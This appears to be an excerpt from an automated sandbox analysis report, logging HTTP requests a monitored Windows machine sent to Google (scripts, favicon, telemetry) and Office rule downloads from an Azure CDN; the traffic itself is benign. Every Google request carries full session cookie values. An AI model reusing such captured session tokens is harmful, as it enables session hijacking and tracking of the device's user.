Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAAAYAGAXIEAAAAAAAAwAQBBAAAQACAEEEACsAAAAAgCgDACAAgAEABQAAAACowAQQEAOACUACR2AAFAgAAABAAHAADJoCEQFIAoAAAAAAAAAAAIAAACGABAIANABEAAGgEgAAEQPAgAAAAAIAgAwEwCGgAEIAAAAAAAAIAMAAAAYUkAAAAAAAAAAAAAAAAAAgCAYCgAoCAAAAAAAAAAAAAAAAAAAAIEmCA/d=0/br=1/rs=ACT90oFG6YoYHEZhg5Ki528uVBEREMKmXQ/m=sylt,sypt?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /client_204?cs=1&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwjcxZO5_42KAxX-KvsDHQWDMAQQj-0KCBY..i&ei=7TpQZ5ybCP7V7M8PhYbCIQ&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.n9glp8jBN-0.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oGee_XWq732v0KP_WxvdXHuplL1-Q,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd._XEEj3XSobE.L.B1.O%2Fam%3DCKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAAAYAGAXIEAAAAAAAAwAQBBAAAQACAEEEACsAAAAAgCgDACAAgAEABQAAAACowAQQEAOACUACR2AAFAgAAABAAHAADJoCEQFIAoAAAAAAAAAAAIAAACGABAIANABEAAGgEgAAEQPAgAAAAAIAgAwEwCGgAEIAAAAAAAAIAMAAAAYUkAAAAAAAAAAAAAAAAAAgCAYCgAoCAAAAAAAAAAAAAAAAAAAAIEmCA%2Fbr%3D1%2Frs%3DACT90oFG6YoYHEZhg5Ki528uVBEREMKmXQ,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.n9glp8jBN-0.es5.O%2Fck%3Dxjs.hd._XEEj3XSobE.L.B1.O%2Fam%3DCKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw,_fmt:prog,_id:_7TpQZ5ybCP7V7M8PhYbCIQ_8 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=syt1,syt0,VsqSCc,sy1ay,P10Owf,sy19r,sy19p,sysf,gSZvdb,syyb,syya,WlNQGd,sysj,sysh,sysg,syse,DPreE,syyo,syym,nabPbb,syy5,syy3,sylt,sypt,CnSW2d,kQvlef,syyn,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAAAYAGAXIEAAAAAAAAwAQBBAAAQACAEEEACsAAAAAgCgDACAAgAEABQAAAACowAQQEAOACUACR2AAFAgAAABAAHAADJoCEQFIAoAAAAAAAAAAAIAAACGABAIANABEAAGgEgAAEQPAgAAAAAIAgAwEwCGgAEIAAAAAAAAIAMAAAAYUkAAAAAAAAAAAAAAAAAAgCAYCgAoCAAAAAAAAAAAAAAAAAAAAIEmCA/d=0/br=1/rs=ACT90oFG6YoYHEZhg5Ki528uVBEREMKmXQ/m=sylt,sypt?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=CLB7KH-jU7lMeQrUU7LnCwL8Vu9uKi7E4vwoylemBl7pMFw5lfWVaxj-EpCgatoaWiwQG4G5T6bZeuS9Tz4U05TB-5QLcKiLY3qKyWyBHSngxh6pSZVKSg5gMepGB2UiUCWriaJWCkUq1zy83YbXGzWbzNWrzgYAWJ-gt7n8j_FKa4-rPZIXcEOBDNYmvuw119QSEfkns96V3gsX
Source: global traffic	HTTP traffic detected: GET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=7TpQZ5ybCP7V7M8PhYbCIQ&zx=1733311231740&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=bx6c6atABiO-sMwq9MuVEDbU2lMB5tc23-n2xh2eu-1vNO3ppQGEzrdJa-uCFnjZQW6-TfSV-uaj5-PH7bczc--iTHAaBLSpxG62Qyr5h6a9A3IzOAGir6xusKhvd_c4SKwWicrpBcwFF0c3bo70tdy_QycpJahaNx6fT89HgvPd4RgOdsZOY4MQndvldga-82F1GVRebXbWbZJNLjlsVNlsNf0
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwjcxZO5_42KAxX-KvsDHQWDMAQQj-0KCBY..i&ei=7TpQZ5ybCP7V7M8PhYbCIQ&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.n9glp8jBN-0.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oGee_XWq732v0KP_WxvdXHuplL1-Q,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd._XEEj3XSobE.L.B1.O%2Fam%3DCKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAAAYAGAXIEAAAAAAAAwAQBBAAAQACAEEEACsAAAAAgCgDACAAgAEABQAAAACowAQQEAOACUACR2AAFAgAAABAAHAADJoCEQFIAoAAAAAAAAAAAIAAACGABAIANABEAAGgEgAAEQPAgAAAAAIAgAwEwCGgAEIAAAAAAAAIAMAAAAYUkAAAAAAAAAAAAAAAAAAgCAYCgAoCAAAAAAAAAAAAAAAAAAAAIEmCA%2Fbr%3D1%2Frs%3DACT90oFG6YoYHEZhg5Ki528uVBEREMKmXQ,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.n9glp8jBN-0.es5.O%2Fck%3Dxjs.hd._XEEj3XSobE.L.B1.O%2Fam%3DCKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw,_fmt:prog,_id:_7TpQZ5ybCP7V7M8PhYbCIQ_8 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=bx6c6atABiO-sMwq9MuVEDbU2lMB5tc23-n2xh2eu-1vNO3ppQGEzrdJa-uCFnjZQW6-TfSV-uaj5-PH7bczc--iTHAaBLSpxG62Qyr5h6a9A3IzOAGir6xusKhvd_c4SKwWicrpBcwFF0c3bo70tdy_QycpJahaNx6fT89HgvPd4RgOdsZOY4MQndvldga-82F1GVRebXbWbZJNLjlsVNlsNf0
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=bx6c6atABiO-sMwq9MuVEDbU2lMB5tc23-n2xh2eu-1vNO3ppQGEzrdJa-uCFnjZQW6-TfSV-uaj5-PH7bczc--iTHAaBLSpxG62Qyr5h6a9A3IzOAGir6xusKhvd_c4SKwWicrpBcwFF0c3bo70tdy_QycpJahaNx6fT89HgvPd4RgOdsZOY4MQndvldga-82F1GVRebXbWbZJNLjlsVNlsNf0
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=syt1,syt0,VsqSCc,sy1ay,P10Owf,sy19r,sy19p,sysf,gSZvdb,syyb,syya,WlNQGd,sysj,sysh,sysg,syse,DPreE,syyo,syym,nabPbb,syy5,syy3,sylt,sypt,CnSW2d,kQvlef,syyn,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=bx6c6atABiO-sMwq9MuVEDbU2lMB5tc23-n2xh2eu-1vNO3ppQGEzrdJa-uCFnjZQW6-TfSV-uaj5-PH7bczc--iTHAaBLSpxG62Qyr5h6a9A3IzOAGir6xusKhvd_c4SKwWicrpBcwFF0c3bo70tdy_QycpJahaNx6fT89HgvPd4RgOdsZOY4MQndvldga-82F1GVRebXbWbZJNLjlsVNlsNf0
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
